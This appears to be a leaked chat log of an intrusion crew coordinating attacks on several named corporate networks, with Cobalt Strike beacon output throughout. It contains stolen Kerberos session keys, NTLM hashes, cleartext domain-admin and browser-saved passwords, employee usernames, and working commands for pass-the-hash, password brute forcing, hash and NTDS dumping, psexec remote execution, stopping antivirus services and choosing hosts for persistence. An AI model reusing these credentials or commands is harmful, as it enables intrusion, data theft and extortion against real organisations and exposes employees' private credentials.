    Flags                : name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType              : aes256_cts_hmac_sha1
    Base64(key)          : LJqX9Tm3yHdb3yUrp7QfI9Dz+5PB9czvC77TDF2/W0M=
```

Wrong

UserName : CORPKLHLQRD01$

Yes, here's the ticket in b64

```
    ServiceName          : krbtgt/CORP.TELEVISA.COM.MX
    ServiceRealm         : CORP.TELEVISA.COM.MX
    UserName             : CORPKLHLQRD01$
    UserRealm            : CORP.TELEVISA.COM.MX
    StartTime            : 2/11/2021 7:38:28 PM
    EndTime              : 2/12/2021 5:38:28 PM
    RenewTill            : 2/18/2021 7:38:28 PM
    Flags                : name_canonicalize, pre_authent, initial, renewable, forwardable
    KeyType              : aes256_cts_hmac_sha1
    Base64(key)          : 4LEdV2c6AR7LiGz0eUuKQNyO3Mrufj6J0E9qAqwDuo=
```

I'm talking about this

```
Group 2 - Ticket Granting Ticket

 [00000000]
   Start/End/MaxRenew: 2/11/2021 7:38:47 PM ; 2/12/2021 5:38:28 AM ;
   Service Name (02) : krbtgt ; CORP.TELEVISA.COM.MX ; @ CORP.TELEVISA.COM.MX
   Target Name  (--) : @ CORP.TELEVISA.COM.MX
   Client Name  (01) : CORPKLHLQRD01$ ; @ CORP.TELEVISA.COM.MX ( $$Delegation Ticket$$ )
   Flags 60210000    : name_canonicalize ; pre_authenticated ; forwardable ;
   Session Key       : 0x00000012 - aes256_hmac
     ba056c87b98f366fc26d590017bc2139382f8b86a0f465afe8a4e71640a0c88f
   Ticket            : 0x00000012 - aes256_hmac ; kvno = 8 [...]
```
```
 [00000001]
   Start/End/MaxRenew: 2/11/2021 7:38:28 PM ; 2/12/2021 5:38:28 AM ; 2/18/2021 7:38:28 PM
   Service Name (02) : krbtgt ; CORP.TELEVISA.COM.MX ; @ CORP.TELEVISA.COM.MX
   Target Name  (02) : krbtgt ; CORP.TELEVISA.COM.MX ; @ CORP.TELEVISA.COM.MX
   Client Name  (01) : CORPKLHLQRD01$ ; @ CORP.TELEVISA.COM.MX ( CORP.TELEVISA.COM.MX )
   Flags 40e10000    : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
   Session Key       : 0x00000012 - aes256_hmac
     e0b11d57673a011ecb886cf4794b8a40dc8edcc3abb9f8fa27413da80ab00eea
   Ticket            : 0x00000012 - aes256_hmac ; kvno = 8 [...]
```

on the available server check the ticket during working hours + in corp?

what domain are you in? is there a kerb ticket?

```
| 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | krbtgt/CORP.TELEVISA.COM.MX | 2/12/2021 5:38:29 AM |
```

```
---------------------------------------------------------------------------------------------------------------------------------------
| LUID  | UserName                              | Service                                                       | EndTime              |
---------------------------------------------------------------------------------------------------------------------------------------
| 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | krbtgt/CORP.TELEVISA.COM.MX                                   | 2/12/2021 5:38:29 AM |
| 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | DNS/corpklhlqdc01.corp.televisa.com.mx                        | 2/12/2021 5:38:29 AM |
| 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | GC/CORPKLHLQDC01.corp.televisa.com.mx/televisa.com.mx         | 2/12/2021 5:38:29 AM |
| 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | ldap/corpklhlqdc01.corp.televisa.com.mx/corp.televisa.com.mx  | 2/12/2021 5:38:29 AM |
| 0x3e4 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPKLHLQDC01.corp.televisa.com.mx                       | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | krbtgt/CORP.TELEVISA.COM.MX                                   | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPKLHLQDC01                                            | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/corpsfedc02                                              | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPSFEVMMLIB                                            | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | host/CORPSFECRT03.corp.televisa.com.mx                        | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | RPCSS/CORPSFECRT03.corp.televisa.com.mx                       | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | cifs/CORPKLHLQDC01.corp.televisa.com.mx/corp.televisa.com.mx  | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | CORPKLHLQRD01$                                                | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | LDAP/CORPKLHLQDC01.corp.televisa.com.mx                       | 2/12/2021 5:38:28 AM |
| 0x3e7 | corpklhlqrd01$ @ CORP.TELEVISA.COM.MX | ldap/corpklhlqdc01.corp.televisa.com.mx/corp.televisa.com.mx  | 2/12/2021 5:38:28 AM |
---------------------------------------------------------------------------------------------------------------------------------------
```

No, there is no check through the rubeus

dlya abuza gpoja about the triage ticket

mikaty same about pass ze ticket?
I looked at a couple of servers the day before yesterday, before they flew away, where there were YES tickets, but they are not katiliv

prochekali on the servers available ticketmiket?

well, according to bludhound they do not have rights there, except genericAll))))

the group admin winel has no access to cars in the group admin winel)

yes, there is no access to that, check?

it means re-check on the cars where the related groups are, through `execute-assembly SharpSharesNG.exe shares list corp_srv.txt --alive --public-only`, see which car has access to which car

let me send a list of cars for each of the polzakov (for the polzakov we are interested in)

memberOf: CN=ISA Full Access

users in the group have full access either to citrix or to vpn

look at adjacent groups in the found pksopopods and so on

gety getovy not program code

```
>memberOf: CN=PKIEnrollGP,OU=PKI Enroll,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>dNSHostName: SFE22614.corp.televisa.com.mx
```

all that showed from `reto-admin`

```
>memberOf: CN=ISA Administracion Wintel,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
```

All PCs from these groups

```
>memberOf: CN=ISA Full Access,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=adminvirt,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Admin_Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
```

These are the admins
```
>memberOf: CN=Admin_Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Servicio Basico,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Internet2 H-Q,OU=Grupos Locales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=impresoras_santafe,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=PKITelevisaUserWireless,OU=PKI Enroll,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=adminvirt,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=SCVMMHPUsers,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Accesos Unicos,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Full Access,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>sAMAccountName: jajimenezar
```

```
>memberOf: CN=IMP-CORP,OU=Servicio_Impresion,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Admin_Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Print_Lanier,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Servicio Basico,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=PKITelevisaUserWireless,OU=PKI Enroll,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Administracion Wintel,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=User_PSO,OU=Grupos PSOs,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=adminvirt,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Accesos Unicos,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Full Access,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Internet3,OU=Grupos Locales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>sAMAccountName: manhernandez
```

```
>memberOf: CN=IMP-CORP,OU=Servicio_Impresion,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Admin_Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Servicio Basico,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=impresoras_santafe,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=CORPSFEAPP05_READ,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=PKITelevisaUserWireless,OU=PKI Enroll,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Administracion Wintel,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=User_PSO,OU=Grupos PSOs,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=adminvirt,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Full Access,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Internet3,OU=Grupos Locales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>sAMAccountName: ldguzmanj
```

```
>memberOf: CN=IMP-CORP,OU=Servicio_Impresion,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Admin_Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=impresoras_santafe,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=PKITelevisaUserWireless,OU=PKI Enroll,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Wintel,OU=Users,OU=HP Wintel,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Servicio Medio,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=reto-admin,CN=Users,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Administracion Wintel,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Servicio Personal IT,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=adminvirt,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=SCVMMHPUsers,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=ISA Full Access,OU=Grupos Globales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=Internet3,OU=Grupos Locales,OU=SantaFe,DC=corp,DC=televisa,DC=com,DC=mx
>memberOf: CN=STAFE_m_PSO,OU=STAFE_m-m,OU=Password,DC=corp,DC=televisa,DC=com,DC=mx
>sAMAccountName: mgmayetg
```

each user you have a password from

each admin can?

one message plus all the bundles are falling off

each user

f me so all deaf

in general have moved a little further into the trasttoche

all the cars where they can go, check the cars

4 admins

what do you have?

but in the near future waiting for the farm for kerbs)

not yet

information or under php on the wind)

anyone searched for oracle?

I would generally make an emphasis on services that are used in the networks, in addition to those that have passed lpe and can look for modules, so if we do not have time on weekdays we will have busy weekends. We need at least 3 networks a week to close completely; on Mon new sessions will come. Sleep and rest, next week will be difficult, right?

I hope it's Saturday-Saturday = weekend :thumbsup:

let's go home

Yes

@tl1 supported

rubbit really fall asleep at the keyboard, go home already?

for domain accounts it can not be so, passes may be different (I think so)

he is listed as yes but he and LA is not he so?

```
Result: Not Found, it is being cracked by our background system. Please wait up to 5 days. A notification email will be sent to you when it is cracked successful , otherwise it is cracked failure.
```

Checked

@user7

```
STAKC.local\sysadmin ff928c9f7bce0d834658c1436381494e
```

in which grid?

Objects gettrunda

have you checked the users by group?
almost 2120659 Objects gettrunda and not 30a

On the second network (mine) only 20+ pk

in #snpartners-com we have 30k pk in the network, yes?

well there on some cars LA are domain users, more LA only hashclir LA?

those hashes as I understood are not valid and LA we do not have?

and only he alone on the key machines, and on other machines he goes through the local admin

only 1 DA without a krede, not going anywhere, got all the possible from those machines on which the ducked second network?

here yes, it's been a week without a declaration

uff

hough to one

yes it's practice so droptestani))

did not try this "childproof" special when the POC is not completely usable

* correct only if you're going to use POC directly from githab, which does not contribute to it

myself not yet, if you can - share how you started)

try it ;-)

you can to @tl1 =))))

on the working machines you do not need to keep anything other than the "client" application, it is not a correct step to take them, it is better to have a separate VPS remote for that

spask

Pack5156

the same as it was

just a minute

@tl1 have the ability to recognize the password ?

```
* Username : Linux
* Domain   : PKGPROD
* NTLM     : c40ce4eab245d09bead615fd67e59a77
* SHA1     : b6fc4dbe67cd7fcc4278a842803c0ff294098f57
* DPAPI    : b4172b5b7931728b8f4abb6a6f85b2f2
```

Which service to stop?
```
SERVICE_NAME: macmnsvc
DISPLAY_NAME: McAfee Agent Common Services
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

SERVICE_NAME: masvc
DISPLAY_NAME: McAfee Agent Service
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

SERVICE_NAME: McAfeeFramework
DISPLAY_NAME: McAfee Agent Backwards Compatibility Service
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

SERVICE_NAME: mfemms
DISPLAY_NAME: McAfee Service Controller
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

SERVICE_NAME: mfevtp
DISPLAY_NAME: McAfee Validation Trust Protection Service
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

SERVICE_NAME: mfewc
DISPLAY_NAME: McAfee Endpoint Security Web Control Service
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
```

```
beacon> hashdump
[*] Tasked beacon to dump hashes
[+] host called home, sent: 82501 bytes
[+] received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
User:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:b3b0692c09bb03d1e67fae2a98952a2f:::
```

and where is the hashdump result of the system? Most likely the AV is fighting the running of this utility.

```
beacon> shell net localgroup Administrators
[*] Tasked beacon to run: net localgroup Administrators
[+] host called home, sent: 60 bytes
[+] received output:
Alias name     Administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
PKGPROD\Domain Admins
PKGPROD\jess
User
The command completed successfully.
```

Local admins what?

passwords don't match

```
beacon> execute-assembly Rubeus.exe brute /users:C:\ProgramData\user.txt /password:C:\ProgramData\pass.txt /dc:2K12SERVER
[*] Tasked beacon to run .NET program: Rubeus.exe brute /users:C:\ProgramData\user.txt /password:C:\ProgramData\pass.txt /dc:2K12SERVER
[+] host called home, sent: 320213 bytes
[+] received output:

  v1.5.0

[+] Valid user => Administrator
[+] Valid user => linux
[+] Valid user => micro
[+] Valid user => micro2
[+] Valid user => mtsi
[+] Valid user => PAC
[+] Valid user => srivera
[+] Valid user => timesavers
[-] Done: No credentials were discovered :'(
```

Wrong. It's okay.
User name jess Full Name jess Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 8/23/2019 1:08:43 PM Password expires Never Password changeable 8/24/2019 1:08:43 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 9/21/2020 9:55:17 AM Logon hours allowed All Local Group Memberships Global Group memberships *CatalogAccess *SalesAccess *InventoryAccess *Domain Users The command completed successfully. ``So wait, about Jess we're talking about hash has not changed, if the password has not changed the other thing set? ``Password changeable 6/13/2014 11:20:21 AM ``A password changed the logon 7/16/2020 2:06:23 PM ``Check if you changed ``net user ``a1fd693cdc0a22a5abede17e517df308 ``Where did Jess have a new hash ? ``` Authentication Id : 1 ; 467262273 (00000001:1bd9db41) Session : NewCredentials from 2 User Name : jess Domain : PKGPROD Logon Server : (null) Logon Time : 9/21/2020 9:00:27 AM SID : S-1-5-21-4059064934-1889560214-2984304678-1162 msv : [00000003] Primary * Username : jess * Domain : PKGPROD * NTLM : a1fd693cdc0a22a5abede17e517df308 * SHA1 : 490a64b492e39b2f40fcfc2472b702b619feab5e * DPAPI : 8e5b8c5beefe8319c0865ea259ad40af ``I think I'm doing something wrong. ``` beacon> mimikatz sekurlsa::pth /user:Linux /domain:PKGPROD /ntlm:c40ce4eab245d09bead615fd67e59a77 /run "net use * "\\192.168.168.10\C$" /persistent:no" [*] Tasked beacon to run mimikatz's sekurlsa::pth /user:Linux /domain:PKGPROD /ntlm:c40ce4eab245d09bead615fd67e59a77 /run "net use * "\\192.168.168.10\C$" /persistent:no" command [+] host called home, sent: 706119 bytes [+] received output: user : Linux domain : PKGPROD program : cmd.exe impers. : no NTLM : c40ce4eab245d09bead615fd67e59a77 | PID 33388 | TID 35340 | LSA Process is now R/W | LUID 1 ; 1028986815 (00000001:3d5517bf) \_ msv1_0 - data copy @ 000001FA427FBC20 : OK ! 
\kerberos - data copy @ 000001FA41E5A6A8 \_ aes256_hmac -> null \_ aes128_hmac -> null \_ rc4_hmac_nt OK \_ rc4_hmac_old OK \_ rc4_md4 OK \_ rc4_hmac_nt_exp OK \_ rc4_hmac_old_exp OK \_ *Password replace @ 000001FA41DB24E8 (32) -> null ``Checked this password with other domain admins? --- Chromium Credential (User: jess) --- URL : https://cw.shipandsave.com/ Username : PKGPROD@ASCENTGL.COM Password : RATER100 --- Chromium Credential (User: jess) --- URL : https://rrts.mercurygate.net/ Username : PKGPRODUCTS@ASCENTGL.COM Password : RATER100 --- Chromium Credential (User: jess) --- URL : https://workforcenow.adp.com/ Username : Jessikinha777. Password : Just in case: don't forget to remove Linux from the brutadata list, let's go the usual way we have a pass with a single YES check other domain admins for this password check how many attempts on this username's wrong password, I didn't get it +@user5 in your team? You guys are nearby, don't you communicate?) I thought I was the only one who wouldn't use it, but everyone did user2-2 beacon> shell net use * "\192.168.168.10\C$" /persistent:no /user:PKGPROD\Linux Pack5156 [*] Tasked beacon to run: net use * "\\192.168.168.10\C$" /persistent:no /user:PKGPROD\Linux Pack5156 [+] host called home, sent: 106 bytes [+] host called home, sent: 19 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. You still have about two more tries to try if it doesn't fit, it will break the account) user2-3 beacon> shell net use G: \192.168.168.15\C$\temp /user:PKGPROD\Linux Pack5156 [*] Tasked beacon to run: net use G: \192.168.168.15\C$\temp /user:PKGPROD\Linux Pack5156 [+] host called home, sent: 95 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. 
user2-3 beacon> shell net use G: \192.168.168.66\C$\temp /user:PKGPROD\Linux Pack5156 [*] Tasked beacon to run: net use G: \192.168.168.66\C$\temp /user:PKGPROD\Linux Pack5156 [+] host called home, sent: 95 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. user2-3 beacon> shell net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150 [*] Tasked beacon to run: net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150 [+] host called home, sent: 98 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. ``Does anyone read the conclusion? user2-3 beacon> shell net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150 [*] Tasked beacon to run: net use G: \192.168.168.66\C$\temp /user:PKGPROD\jess Payables5150 [+] host called home, sent: 98 bytes [+] received output: System error 86 has occurred. The specified network password is not correct. ``The pole is fine and there was no foul play on his part because ``` Last logon 7/16/2020 2:06:23 PM ``lol)he just didn't press ``rev2self``@user7 try net use with the YES creds on dcwhy do you get different output from the same command? beacon> shell net user Linux /dom [*] Tasked beacon to run: net user Linux /dom [+] host called home, sent: 50 bytes [+] received output: The request will be processed at a domain controller for domain pkgprod.local. 
User name linux Full Name Linux Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 6/12/2014 11:20:21 AM Password expires Never Password changeable 6/13/2014 11:20:21 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 7/16/2020 2:06:23 PM Logon hours allowed All Local Group Memberships *Administrators Global Group memberships *Group Policy Creator *Domain Admins *Enterprise Admins *Domain Users *Schema Admins The command completed successfully. ```shell net user Linux /dom have a problem with the session on the dk? Yes, I see, I didn't notice)`` It's written there, but thank you)`` kerberos : * Username : Linux * Domain : PKGPROD * Password : Pack5156 the question is why is it better to hurry up the question is why YES came, mb anomalous activity and will reboot yes, it is better to jump to DK first? then dump the NTDSlol)and from where? which way? 
got the password from YES ``` Authentication Id : 0 ; 680664956 (00000000:28921f7c) Session : NewCredentials from 2 User Name : jess Domain : PKGPROD Logon Server : (null) Logon Time : 9/18/2020 9:26:21 AM SID : S-1-5-21-4059064934-1889560214-2984304678-1162 msv : [00000003] Primary * Username : Linux * Domain : PKGPROD * NTLM : c40ce4eab245d09bead615fd67e59a77 * SHA1 : b6fc4dbe67cd7fcc4278a842803c0ff294098f57 * DPAPI : b4172b5b7931728b8f4abb6a6f85b2f2 tspkg : wdigest : * Username : Linux * Domain : PKGPROD * Password : (null) kerberos : * Username : Linux * Domain : PKGPROD * Password : Pack5156 ssp : credman : ```user5eyJhbGciOiJBOLKn5HkwYoFsCllZfCY8Pj8Hy6Ek1aGc3jfZXmCyG73z/MbN9vE2mtKpRwB9HTGL/MQ6S/oMuUTorln8DIPJ5G3ckk1EJn1UrT7F7p0hD19O5wbYO9EIcNK9ebSeU62v0CkgxU3bzVmxgG6b9822+tgYexOJrCdWh8rMS192GXegVuWVujOeT9ZP8q5p+zZlGLQ2IpbcYw7daBWhqlgdBw==вы don't pull servers in coba before closing@user4 coba in ls@user3 to @user8 for nowGood day everyone:space_invader:helloHello again fell offtoday until what time?@user1 to #snpartners-com please.Yes nowhere? and the spns themselves, too, it seems like something you can chek too. Yesterday I read something about it yes, there is a skul server, in powerupsql it says that you need to specify [machine]/instanseName...talk about spns? There is a thought to poke the skul, but do not know how to know the name of the instance of the subject? or to test from the msfa there is a sense to look for additional modules all patched not on attack but on scan YES not taken? The day before yesterday changed passwords, deleted unnecessary YES. Nashuemel maybe why were burned? groups can write through #stanthonyskc-com more `stanthonyskc.com`STAKC in the works, but there we are probably spalichto us in the workspanki hoihiPrievest who? 7dfa0531d73101ca080c7379a9bff1c7 P@ssw0rd123! 
62e68029812e6498197aaa32824c183e P1v0t@l 25228f174278a82e7202a25df2d9923b Operator2010 ``Dump these hashes ``` 7dfa0531d73101ca080c7379a9bff1c7 62e68029812e6498197aaa32824c183e 25228f174278a82e7202a25df2d9923b ``like a strange dc in the UK domain I dumped his sysinfo into toolspanel the new dll crashes there as well, but it doesn't show up on the AB `` >dNSHostName: DCWAS45.Wilsonart.com >description: Symantec End Point Management Server Ping statistics for 170.7.76.245: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss), ``` ``` >dNSHostName: FLWAS03.Wilsonart.com >description: PROD Symantec AntiVirus Management Server Ping statistics for 170.7.20.198: Packets: Sent = 4, Received = 4, Lost = 0 (0% loss) I'm coming to the group in the TV, if anything Deb[ ](https://mediaeveryone.com/group/wilsonart-com?msg=GYkZN2djRqCXM8dDY) who did not come? we group created by the boss and added depa there. and now he does not respond there I sent you two times have you written to depa?in shelter, there's nothing to gather (we need to solve something with dll - simantik chopped, so we can not get through to about 4 or 6 other domains (only 4 domains want to get through))) today do not want to close? how are you doing? it's in cmd /c they're next to each other, it makes no sense i've tried it that way ``` remote-exec psexec 170.7.76.170 cmd /c C:\Windows\Temp\7za a ntds-eu.7z C:\Windows\Temp\ntds ``No one knows what's wrong? [ ](https://mediaeveryone.com/group/wilsonart-com?msg=KWRNtkPsgfdHoqWgC) paths are relative. ``French2014, please send me more of this hash. ``` fd20144890966cfb2300ec6629249cab `````` pip install impacket pip install pycrypto pip install pyasn1 apt-get install python-dev all files are placed in the same folder together with the script, there will be 4 secretsdump.py -ntds ntds.dit -system SYSTEM -outputfile result local ``Where is the error here? 
remote-exec psexec 170.7.76.170 cmd /c C:\Windows\Temp\7za a ntds-eu.7z ntds ntds-eu 7z ntds also bypassed no, haven't tried that.I mean the load on port 80 in the coboo is absent on port 80 have you tried that? -and bind by psexec through normal psexec ?neither in coboo nor in msf doesn't fly through[ ](https://mediaeveryone.com/group/wilsonart-com?msg=fCNHA6TDppNxAceio) would be so easy.in that domain 80% of the servers on 2003)and whatever 2003 just hashdump make dc on 2003? I don't think so.ntdsutil ntdsutil "ac in ntds" "ifm" "cr fu C:\windows\Temp\ntds" q q ``` did it ever work on 2003? ``Dell@2020```` 4bcba61efb7ce5e848ec339394829572 ``` @tl1 throw in the Kmd5 unpacked ukwadc01.uk.wilsonart.com [170.7.70.214] ``answer - no it's not possible to mount dkprosto clarify if the question stood up @user9 a misunderstanding came upa forget it, I confused you didn't understand where dk todk in the group of crits servers)yes to him)ah, I thought you about the second domain))) and the question was to @user8)well mount dk not need all the same mb... )I do not understand)well dk sees)external servers see? what edr? HQTAS73.Wilsonart.com DEVBIOBI.Wilsonart.com ``[ ](https://mediaeveryone.com/group/wilsonart-com?msg=LsGJ6Paosc8cpwbSS) well there is and there is, the main thing when you come inno place search for a place to run there are many where the folder yes there is if not then do not throw? for example, backup, veeam, production ... 
and also the server is not in the crits group of servers possible more rules to select the server under the percis on the server is started by the system and is run by the staff masked in the folder system32 schtasks /query - check whether the stack was created after the execution (dll creates the stack after launching) delete the task which was launched Server is selected where there are no active YES and EA processes and where YES or EA have not visited for a long time (check users folders for date of change) the server does not belong to a crisis group of servers, for example, backup, veeam, production ... people responsible for the forum, then move there@user9 please describe here for all do not remember the rules will do? if you think I do not interfere) would give the go-ahead that remember would immediately throw another thing the rules we remember, so brainstorm the same on the second network help guys just asked a question and silencea where did you get them?) or your own? and you give us them?) rules remember? drop a couple of dllnet here do not drop, right? `VMware vCenter 6.0 Server DCWAS79```` >description: Symantec End Point Management Server >dNSHostName: DCWAS45.Wilsonart.com >description: PROD Symantec AntiVirus Management Server >dNSHostName: FLWAS03.Wilsonart.com >description: PROD Symantec AntiVirus Management Server Directory of C:\Windows\Temp\ntds 12/23/2020 06:00 PM . 12/23/2020 06:00 PM . 12/23/2020 06:00 PM Active Directory 